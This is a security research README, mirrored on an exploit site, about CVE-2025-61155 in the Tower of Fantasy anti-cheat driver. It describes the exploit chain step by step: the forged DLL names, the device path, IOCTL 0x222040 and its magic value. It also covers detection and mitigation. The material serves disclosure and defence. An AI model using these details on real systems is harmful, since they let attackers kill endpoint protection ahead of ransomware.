Exploit for CVE-2025-61155

## https://sploitus.com/exploit?id=8FA4E1EF-9BCF-5027-85E0-2F420F5171B6
# CVE-2025-61155 — Arbitrary Process Termination in `GameDriverX64.sys`

[![CVE](https://img.shields.io/badge/CVE-2025--61155-red)](https://vulners.com/cve/CVE-2025-61155)
[![CVSS 3.1](https://img.shields.io/badge/CVSS_3.1-5.5_Medium-orange)](https://nvd.nist.gov/vuln/detail/CVE-2025-61155)
[![CWE](https://img.shields.io/badge/CWE-862_%2F_284-blue)](https://cwe.mitre.org/data/definitions/862.html)
[![Exploited in the wild](https://img.shields.io/badge/exploited_in_the_wild-yes-critical)](docs/05-in-the-wild.md)
[![License: MIT](https://img.shields.io/badge/License-MIT-green)](LICENSE)

A signed kernel-mode anti-cheat driver — `GameDriverX64.sys`, shipped with
**Tower of Fantasy** (Hotta Studio / Perfect World) — lets **any unprivileged
local user terminate arbitrary processes**, including PPL-protected
antivirus/EDR services. It is the kind of primitive ransomware operators reach
for, and it is being **actively abused in the wild** by the *Interlock* operation
as a BYOVD EDR-killer.

This repository is a full, reproducible teardown: the security advisory, an
original IDA Pro reverse-engineering analysis, a proof of concept, and ready-to-use
detection and mitigation content.

> **Researchers:** Gabriel Maciel Ramos · Anthony Sforzin · Gabriel Gomes

## Demo



> Proof of concept terminating a target process through the driver.
> Inline player not rendering? [Download the clip](assets/demo.mp4).

## At a glance

| | |
| --- | --- |
| **Driver** | `GameDriverX64.sys` (KMDF), versions `<= 7.23.4.7` |
| **Vendor** | Hotta Studio / Perfect World — internal `PwrdDriver` / `HtDriver2.0` |
| **Signer** | `Fedeen Games Limited` (valid Authenticode) |
| **Device** | `\\.\HtAntiCheatDriver` |
| **Primitive** | IOCTL `0x222040`, magic `0xFA123456` → `ZwTerminateProcess` in kernel context |
| **Privileges required** | None beyond a standard local user |
| **Impact** | Terminate any process, incl. PPL AV/EDR → BYOVD EDR-killer |
| **CVSS 3.1** | 5.5 Medium · `AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H` |
| **Status** | Published, **exploited in the wild** (Interlock, Reynolds) |

## The exploit chain

```
1. LoadLibrary a DLL named QmGUI.dll / QmGUI4.dll / gameuirender.dll
   └─ passes the filename-only "verification" in IRP_MJ_CREATE

2. CreateFile("\\.\HtAntiCheatDriver")          ← default DACL, any user can open

3. DeviceIoControl(0x222040, {0xFA123456, pid}) ← only gate is a hardcoded magic

4. Driver: ZwOpenProcess(GENERIC_ALL) → ZwTerminateProcess
   └─ runs with PreviousMode == KernelMode → access check skipped
   └─ kills ANY process, including protected AV/EDR
```

Three "guardrails", all defeated: the device has no admin-only ACL, the CREATE
check compares a **module name string** (forge it by loading any same-named DLL),
and the IOCTL gate is a **constant baked into the binary**. The kill then runs in
the kernel, so process protection (PPL) does not apply. Full walkthrough in
[`docs/01-technical-analysis.md`](docs/01-technical-analysis.md).

## Repository map

| Path | Contents |
| --- | --- |
| [`advisory.md`](advisory.md) | Formal security advisory |
| [`docs/01-technical-analysis.md`](docs/01-technical-analysis.md) | Original IDA Pro reverse-engineering teardown |
| [`docs/02-exploitation.md`](docs/02-exploitation.md) | Exploit chain and PoC walkthrough |
| [`docs/03-detection.md`](docs/03-detection.md) | How to detect the driver and its abuse |
| [`docs/04-mitigation.md`](docs/04-mitigation.md) | HVCI / WDAC blocking and removal |
| [`docs/05-in-the-wild.md`](docs/05-in-the-wild.md) | Interlock / BYOVD usage and timeline |
| [`poc/poc.cpp`](poc/poc.cpp) | Minimal proof of concept |
| [`detection/cve-2025-61155.yar`](detection/cve-2025-61155.yar) | YARA rules |
| [`detection/iocs.md`](detection/iocs.md) | Indicators of compromise |
| [`sample/SAMPLE.md`](sample/SAMPLE.md) | Sample identity & provenance (binary not committed) |
| [`NEWS.md`](NEWS.md) | Running log of developments |
| [`SECURITY.md`](SECURITY.md) | Responsible-use policy and contact |

## Reverse engineering

The analysis in [`docs/01-technical-analysis.md`](docs/01-technical-analysis.md)
was produced statically in **IDA Pro 9.4 + Hex-Rays** against the
legitimately-signed, vulnerable sample
(SHA-256 `9DDAE4…3C9F1E`, see [`sample/SAMPLE.md`](sample/SAMPLE.md)). Every
address, constant and decompiled snippet in this repo was lifted directly from the
binary and independently corroborates public reporting on the in-the-wild tooling.

## Defenders: start here

1. **Block** the driver via the Microsoft Vulnerable Driver Blocklist (HVCI) and/or
   a WDAC deny rule — [`docs/04-mitigation.md`](docs/04-mitigation.md).
2. **Hunt** with the YARA rules and IOCs — [`detection/`](detection/).
3. **Detect** exploitation (device opens, the `0x222040` IOCTL, kernel-origin
   process kills) — [`docs/03-detection.md`](docs/03-detection.md).

## Disclaimer

For defensive security, detection engineering, education and research only. Use the
proof of concept only on systems you own or are authorized to test. See
[`SECURITY.md`](SECURITY.md). The vulnerable driver binary is intentionally not
included.

## References

- NVD — https://nvd.nist.gov/vuln/detail/CVE-2025-61155
- MITRE / CVE.org — https://vulners.com/cve/CVE-2025-61155
- GitHub Advisory — https://github.com/advisories/GHSA-9qfv-m6w2-fhch
- Canonical advisory (co-author) — https://github.com/pollotherunner/CVE-2025-61155
- FortiGuard Labs — https://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks
- Securonix — https://connect.securonix.com/threat-research-intelligence-62/cve-2025-61155-and-interlock-ransomware-a-converging-threat-198
- Vespalec, "Tower of Flaws" — https://vespalec.com/blog/tower-of-flaws/